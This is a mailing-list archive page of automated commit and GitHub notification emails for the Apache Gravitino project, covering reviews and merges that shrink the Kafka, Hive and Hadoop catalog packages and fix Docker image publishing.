2024-08-26 Thread yuqi4733
This is an automated email from the ASF dual-hosted git repository. yuqi4733 pushed a commit to branch branch-0.6 in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/branch-0.6 by this push: new 1430ce10a [#4688] fix (docker): Fix

Re: [PR] [#4608] feat(core): Supports to load fields lazily [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4690: URL: https://github.com/apache/gravitino/pull/4690#issuecomment-2311390704 I will wait this after the 0.6.0 release. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go

Re: [PR] [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 commented on PR #4693: URL: https://github.com/apache/gravitino/pull/4693#issuecomment-2311392795 @diqiu50 Can you please leave a comment here so I can assign this PR to you. -- This is an automated message from the Apache Git Service. To respond to the message, please log on

Re: [PR] [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB [gravitino]

2024-08-26 Thread via GitHub
mchades commented on PR #4532: URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2311415971 > Do we need to exclude runtime guava and slf4j jars like @yuqi1129 did for jdbc catalog? I think our base classloader already provided these jars. fixed -- This is an automate

Re: [PR] [MINOR] Add originator of Gravitino to the NOTICE file [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4670: URL: https://github.com/apache/gravitino/pull/4670#issuecomment-2311439069 @JunpingDu @justinmclean please help to review again. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL

Re: [I] [Subtask] Shrink Kafka catalog binary package size [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4530: [Subtask] Shrink Kafka catalog binary package size URL: https://github.com/apache/gravitino/issues/4530 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comm

Re: [PR] [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4532: URL: https://github.com/apache/gravitino/pull/4532 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

Re: [I] [Subtask] Shrink Kafka catalog binary package size [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4530: [Subtask] Shrink Kafka catalog binary package size URL: https://github.com/apache/gravitino/issues/4530 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comm

(gravitino) branch main updated: [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB (#4532)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch main in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/main by this push: new ff9405c52 [#4530] improvement(kafka-catalog): redu

Re: [PR] [#4528] improvement(hive-catalog): reduce hive catalog libs size from 146MB to 76MB [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4531: URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2311450212 I'm definitely sure that there're many libs from Hive can be excluded, like llap, so please carefully check them one by one. -- This is an automated message from the Apache Git Serv

Re: [PR] [#4528] improvement(hive-catalog): reduce hive catalog libs size from 146MB to 76MB [gravitino]

2024-08-26 Thread via GitHub
mchades commented on PR #4531: URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2311452744 > I'm definitely sure that there're many libs from Hive can be excluded, like llap, so please carefully check them one by one. I have excluded llap before, but encountered an erro

Re: [PR] [#4525] improvement(catalog-hadoop): Shrink Hadoop catalog binary package size to 44MB. [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4535: URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2311453581 I guess some jars like jetty may not be needed, maybe we can also exclude them. -- This is an automated message from the Apache Git Service. To respond to the message, please log on

Re: [PR] [#4525] improvement(catalog-hadoop): Shrink Hadoop catalog binary package size to 44MB. [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 commented on PR #4535: URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2311455006 > I guess some jars like jetty may not be needed, maybe we can also exclude them. Okay, let me give it a try. -- This is an automated message from the Apache Git Service.

  1   2   >